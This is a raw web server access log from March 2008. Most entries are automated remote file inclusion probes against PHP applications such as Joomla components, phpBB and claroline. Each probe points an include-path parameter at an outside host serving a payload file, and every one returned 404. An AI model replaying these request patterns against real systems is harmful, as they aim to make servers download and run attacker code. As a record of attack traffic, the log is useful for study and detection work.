64.26.63.20 - - [25/Mar/2008:05:00:15 -0700] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
64.26.63.20 - - [25/Mar/2008:05:00:15 -0700] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
64.26.63.20 - - [25/Mar/2008:05:00:27 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
64.26.63.20 - - [25/Mar/2008:05:00:27 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
81.176.226.180 - - [25/Mar/2008:05:00:28 -0700] "GET //ultrastats/include/functions_common.php?gl_root_path=http://vivace.biz/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.76.205 - - [25/Mar/2008:05:00:39 -0700] "GET //include/status.inc.php?tm_includepath=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.181.206.50 - - [25/Mar/2008:05:01:21 -0700] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://tompakovcapital.com/.dat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.206.50 - - [25/Mar/2008:05:01:22 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://tompakovcapital.com/.dat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [25/Mar/2008:05:02:05 -0700] "GET /logs/access_080313.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
158.110.147.192 - - [25/Mar/2008:05:02:10 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.fleecegigs.co.uk/images/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
158.110.147.192 - - [25/Mar/2008:05:02:10 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.fleecegigs.co.uk/images/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:05:02:35 -0700] "GET /logs/access_080225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.135.200.3 - - [25/Mar/2008:05:02:54 -0700] "GET /logs/access_080215.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.135.200.3 - - [25/Mar/2008:05:03:00 -0700] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.135.200.3 - - [25/Mar/2008:05:03:05 -0700] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.35.0.230 - - [25/Mar/2008:05:03:13 -0700] "GET /index.php?option=com_jmsitemap&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.194 - - [25/Mar/2008:05:03:15 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
87.230.7.194 - - [25/Mar/2008:05:03:15 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
202.181.206.50 - - [25/Mar/2008:05:03:18 -0700] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://tompakovcapital.com/.dat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.35.0.230 - - [25/Mar/2008:05:03:37 -0700] "GET /logs/access_080313.log/index.php?option=com_jmsitemap&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.35.0.230 - - [25/Mar/2008:05:03:37 -0700] "GET /logs/index.php?option=com_jmsitemap&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.35.0.230 - - [25/Mar/2008:05:04:02 -0700] "GET /logs/access_080215.log/index.php?option=com_jmsitemap&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:05:05:39 -0700] "GET /logs/access_080201.log//claroline/tracking/userLog.php?rootSys=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:05:05:40 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:05:05:45 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:05:06:30 -0700] "GET /logs/access_080201.log//claroline/phpbb/page_tail.php?includePath=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:05:06:30 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:05:06:33 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.1.62.200 - - [25/Mar/2008:05:06:35 -0700] "GET ///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
208.1.62.200 - - [25/Mar/2008:05:06:36 -0700] "GET /logs///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
207.44.244.77 - - [25/Mar/2008:05:06:43 -0700] "GET /start.php?s=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.213.31 - - [25/Mar/2008:05:07:42 -0700] "GET /logs/access_080218.log HTTP/1.0" 200 622413 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
216.18.5.126 - - [25/Mar/2008:05:07:52 -0700] "GET //index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
216.18.5.126 - - [25/Mar/2008:05:07:53 -0700] "GET /logs//index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
74.6.20.156 - - [25/Mar/2008:05:08:17 -0700] "GET /tmp/?N=A HTTP/1.0" 200 1319 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.60.207.200 - - [25/Mar/2008:05:10:24 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.lieblingshomepage.de/feedbackservice//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.135.200.3 - - [25/Mar/2008:05:10:36 -0700] "GET /logs/access_080313.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.105.82 - - [25/Mar/2008:05:10:58 -0700] "GET /logs/access_080215.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.paolodune.it/.ownz/safeon.dat???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.105.82 - - [25/Mar/2008:05:10:58 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.paolodune.it/.ownz/safeon.dat???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.105.82 - - [25/Mar/2008:05:10:58 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.paolodune.it/.ownz/safeon.dat???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [25/Mar/2008:05:11:30 -0700] "GET /logs/access_080215.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [25/Mar/2008:05:11:30 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [25/Mar/2008:05:11:31 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [25/Mar/2008:05:12:00 -0700] "GET /administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.218.85.18 - - [25/Mar/2008:05:12:15 -0700] "GET /logs/access_080215.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [25/Mar/2008:05:12:16 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [25/Mar/2008:05:12:16 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.105.82 - - [25/Mar/2008:05:13:03 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.paolodune.it/.ownz/safeon.dat???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.36.241.244 - - [25/Mar/2008:05:13:09 -0700] "GET /administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:05:13:27 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:05:13:28 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
67.18.105.82 - - [25/Mar/2008:05:13:45 -0700] "GET /logs/access_080126.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.paolodune.it/.ownz/safeon.dat???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.35.0.230 - - [25/Mar/2008:05:14:00 -0700] "GET /logs/access.log/index.php?option=com_jcalpro&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.35.0.230 - - [25/Mar/2008:05:14:01 -0700] "GET /logs/index.php?option=com_jcalpro&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.53.125 - - [25/Mar/2008:05:14:17 -0700] "GET /logs/access_080215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.53.125 - - [25/Mar/2008:05:14:17 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.53.125 - - [25/Mar/2008:05:14:17 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.207.104 - - [25/Mar/2008:05:14:37 -0700] "GET /logs/access_080215.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.207.104 - - [25/Mar/2008:05:14:37 -0700] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.29.106 - - [25/Mar/2008:05:14:59 -0700] "GET /bikes/dteel/2008_01_26/ HTTP/1.0" 200 6600 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.60.207.200 - - [25/Mar/2008:05:15:06 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.lieblingshomepage.de/feedbackservice//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.60.207.200 - - [25/Mar/2008:05:15:06 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.lieblingshomepage.de/feedbackservice//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.60.207.200 - - [25/Mar/2008:05:15:07 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.lieblingshomepage.de/feedbackservice//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.169.157.58 - - [25/Mar/2008:05:15:14 -0700] "GET /bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path=http://autogg.it/images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
81.169.157.58 - - [25/Mar/2008:05:15:16 -0700] "GET /logs/bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path=http://autogg.it/images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.7.207.104 - - [25/Mar/2008:05:15:28 -0700] "GET /logs/access_080313.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.55 - - [25/Mar/2008:05:15:52 -0700] "GET /bikes/dteel/MVI_2430.AVI HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.111.173.45 - - [25/Mar/2008:05:15:52 -0700] "GET /test.php?page=http://yoga0400.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.18.207.65 - - [25/Mar/2008:05:17:34 -0700] "GET /logs/access_080126.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.17.23 - - [25/Mar/2008:05:18:17 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
84.40.17.23 - - [25/Mar/2008:05:18:17 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
124.217.247.166 - - [25/Mar/2008:05:18:35 -0700] "GET /logs/access_080215.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [25/Mar/2008:05:18:36 -0700] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [25/Mar/2008:05:18:36 -0700] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.60.207.200 - - [25/Mar/2008:05:18:53 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.lieblingshomepage.de/feedbackservice//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.21.88 - - [25/Mar/2008:05:18:59 -0700] "GET /bikes/dteel/140CANON/ HTTP/1.0" 200 971 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.218.85.18 - - [25/Mar/2008:05:19:16 -0700] "GET /logs/access_080126.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.38 - - [25/Mar/2008:05:19:25 -0700] "GET /errors.php?error=http://autogg.it/images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
85.25.149.38 - - [25/Mar/2008:05:19:25 -0700] "GET /logs/errors.php?error=http://autogg.it/images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
74.6.20.96 - - [25/Mar/2008:05:20:06 -0700] "GET /bikes/dteel/2008_01_26/ZbThumbnail.info HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
124.217.247.166 - - [25/Mar/2008:05:20:22 -0700] "GET /logs/access_080313.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [25/Mar/2008:05:20:36 -0700] "GET //skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [25/Mar/2008:05:20:36 -0700] "GET //skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.7.194 - - [25/Mar/2008:05:20:54 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
87.230.7.194 - - [25/Mar/2008:05:20:55 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
216.127.86.119 - - [25/Mar/2008:05:20:56 -0700] "GET /logs/access_071214.log/index.php?option=com_newsfeeds&Itemid=&mosConfig_absolute_path=http://www.afmp.nl/veteranen/languages/pl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.86.119 - - [25/Mar/2008:05:20:56 -0700] "GET /index.php?option=com_newsfeeds&Itemid=&mosConfig_absolute_path=http://www.afmp.nl/veteranen/languages/pl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.86.119 - - [25/Mar/2008:05:20:56 -0700] "GET /logs/index.php?option=com_newsfeeds&Itemid=&mosConfig_absolute_path=http://www.afmp.nl/veteranen/languages/pl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.118.102.153 - - [25/Mar/2008:05:21:21 -0700] "GET /logs/index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
87.118.102.153 - - [25/Mar/2008:05:21:21 -0700] "GET /index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
74.6.20.229 - - [25/Mar/2008:05:22:02 -0700] "GET /tmp/sess_d45d88e972ed62073380142df97e12a4 HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.180.216.43 - - [25/Mar/2008:05:22:29 -0700] "GET /logs/access_080207.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://erusrox.t35.com/ids/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.20.93 - - [25/Mar/2008:05:22:33 -0700] "GET /bikes/dteel/10MAR07/ HTTP/1.0" 200 833 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.239.121.190 - - [25/Mar/2008:05:22:51 -0700] "GET /logs/access_080225.log/!scanhttp://acme-superstore.com/mlm/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.19.106 - - [25/Mar/2008:05:22:51 -0700] "GET /bikes/dteel/EQ2/ HTTP/1.0" 200 825 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.239.121.190 - - [25/Mar/2008:05:22:51 -0700] "GET /!scanhttp://acme-superstore.com/mlm/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.121.190 - - [25/Mar/2008:05:22:52 -0700] "GET /logs/!scanhttp://acme-superstore.com/mlm/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.76.205 - - [25/Mar/2008:05:23:16 -0700] "GET /logs/access_080216.log//include/status.inc.php?tm_includepath=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.18.53 - - [25/Mar/2008:05:23:24 -0700] "GET /bikes/dteel/10MAR07/?N=D HTTP/1.0" 200 833 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.52.2.130 - - [25/Mar/2008:05:23:34 -0700] "GET /logs/access_080219.log/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [25/Mar/2008:05:23:34 -0700] "GET /logs/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.21.223.90 - - [25/Mar/2008:05:23:43 -0700] "GET /logs/access_080313.log/components/com_forum/download.php?phpbb_root_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.223.90 - - [25/Mar/2008:05:23:45 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.36.241.244 - - [25/Mar/2008:05:23:46 -0700] "GET /logs/access_080219.log/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.36.241.244 - - [25/Mar/2008:05:23:47 -0700] "GET /logs/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [25/Mar/2008:05:23:47 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.dfmuses.xpg.com.br/uses/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.21.223.90 - - [25/Mar/2008:05:23:48 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.16.61 - - [25/Mar/2008:05:23:56 -0700] "GET /logs/access_080223.log/index.php?sourcedir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.16.61 - - [25/Mar/2008:05:23:56 -0700] "GET /index.php?sourcedir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
